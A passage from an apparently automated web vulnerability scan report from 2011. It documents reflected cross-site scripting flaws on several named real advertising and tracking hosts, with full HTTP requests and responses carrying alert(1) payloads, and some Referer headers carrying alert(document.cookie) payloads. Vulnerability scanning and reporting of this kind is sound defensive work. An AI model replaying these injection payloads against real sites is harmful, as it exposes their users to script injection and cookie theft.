The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
4.1. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.bluelithium.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d6da"-alert(1)-"f1f4da902d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=1x1§ion=1603038&9d6da"-alert(1)-"f1f4da902d6=1 HTTP/1.1 Host: ads.bluelithium.com Proxy-Connection: keep-alive Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1099 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:00:03 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Wed, 19 Jan 2011 18:00:03 GMT Pragma: no-cache Content-Length: 4636 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?9d6da"-alert(1)-"f1f4da902d6=1&Z=1x1&s=1603038&_salt=3571184072";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array ...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 842ab'%3balert(1)//40a370322b1 was submitted in the h parameter. This input was echoed as 842ab';alert(1)//40a370322b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=2DFE311&w=300&h=250842ab'%3balert(1)//40a370322b1 HTTP/1.1 Host: ads.roiserver.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 382 Date: Wed, 19 Jan 2011 17:59:36 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://ads.roiserver.com/disp?pid=2DFE311&rand=" + myRand;
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a473c"%3balert(1)//5cda4ab509d was submitted in the pid parameter. This input was echoed as a473c";alert(1)//5cda4ab509d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=2DFE311a473c"%3balert(1)//5cda4ab509d&w=300&h=250 HTTP/1.1 Host: ads.roiserver.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 382 Date: Wed, 19 Jan 2011 17:59:28 GMT
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://ads.roiserver.com/disp?pid=2DFE311a473c";alert(1)//5cda4ab509d&rand=" + myRand;
The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b68a5'%3balert(1)//ef73ca3b12e was submitted in the w parameter. This input was echoed as b68a5';alert(1)//ef73ca3b12e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=2DFE311&w=300b68a5'%3balert(1)//ef73ca3b12e&h=250 HTTP/1.1 Host: ads.roiserver.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 382 Date: Wed, 19 Jan 2011 17:59:32 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://ads.roiserver.com/disp?pid=2DFE311&rand=" + myRand;
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 56c1b<script>alert(1)</script>1d321066f7f was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=256c1b<script>alert(1)</script>1d321066f7f&c2=6035786&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 26 Jan 2011 17:59:23 GMT Date: Wed, 19 Jan 2011 17:59:23 GMT Connection: close Content-Length: 3587
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 33c9b<script>alert(1)</script>7d5427cace2 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=33c9b<script>alert(1)</script>7d5427cace2&tm=919330 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 26 Jan 2011 17:59:36 GMT Date: Wed, 19 Jan 2011 17:59:36 GMT Connection: close Content-Length: 3581
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 90558<script>alert(1)</script>0af258cd0b5 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=603578690558<script>alert(1)</script>0af258cd0b5&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 26 Jan 2011 17:59:24 GMT Date: Wed, 19 Jan 2011 17:59:24 GMT Connection: close Content-Length: 3587
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 26bb2<script>alert(1)</script>dadffb12f82 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6035786&c3=603578626bb2<script>alert(1)</script>dadffb12f82&c4=&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 26 Jan 2011 17:59:26 GMT Date: Wed, 19 Jan 2011 17:59:26 GMT Connection: close Content-Length: 3587
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload f09c8<script>alert(1)</script>b3efd23cef2 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=f09c8<script>alert(1)</script>b3efd23cef2&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 26 Jan 2011 17:59:29 GMT Date: Wed, 19 Jan 2011 17:59:29 GMT Connection: close Content-Length: 3587
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 77439<script>alert(1)</script>58583c10800 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=77439<script>alert(1)</script>58583c10800&c6=&c15=&tm=919330 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 26 Jan 2011 17:59:32 GMT Date: Wed, 19 Jan 2011 17:59:32 GMT Connection: close Content-Length: 3581
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 147af<script>alert(1)</script>202194faed4 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=147af<script>alert(1)</script>202194faed4&c15=&tm=919330 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 26 Jan 2011 17:59:34 GMT Date: Wed, 19 Jan 2011 17:59:34 GMT Connection: close Content-Length: 3581
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daf00'%3balert(1)//9a4146cf137 was submitted in the $ parameter. This input was echoed as daf00';alert(1)//9a4146cf137 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=daf00'%3balert(1)//9a4146cf137&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1099:daf00';alert(1)//9a4146cf137;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=524 Expires: Wed, 19 Jan 2011 18:09:46 GMT Date: Wed, 19 Jan 2011 18:01:02 GMT Connection: close Content-Length: 1990
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',daf00';alert(1)//9a4146cf137';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,daf00';alert(1)//9a4146cf137;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e01e"%3balert(1)//82425b7431e was submitted in the $ parameter. This input was echoed as 1e01e";alert(1)//82425b7431e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=1e01e"%3balert(1)//82425b7431e&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1099:1e01e";alert(1)//82425b7431e;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=524 Expires: Wed, 19 Jan 2011 18:09:46 GMT Date: Wed, 19 Jan 2011 18:01:02 GMT Connection: close Content-Length: 1990
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',1e01e";alert(1)//82425b7431e';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,1e01e";alert(1)//82425b7431e;z="+Math.random();}
4.14. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://d7.zedo.com
Path:
/bar/v16-401/d3/jsc/fm.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a19b1'-alert(1)-'4b1450f596b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fm.js?a19b1'-alert(1)-'4b1450f596b=1 HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 941 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "81ee0daa-82a5-4989a5927aac0" X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=253 Expires: Wed, 19 Jan 2011 18:11:59 GMT Date: Wed, 19 Jan 2011 18:07:46 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd682'%3balert(1)//8194c718852 was submitted in the q parameter. This input was echoed as fd682';alert(1)//8194c718852 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=fd682'%3balert(1)//8194c718852&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1
Response (redirected)
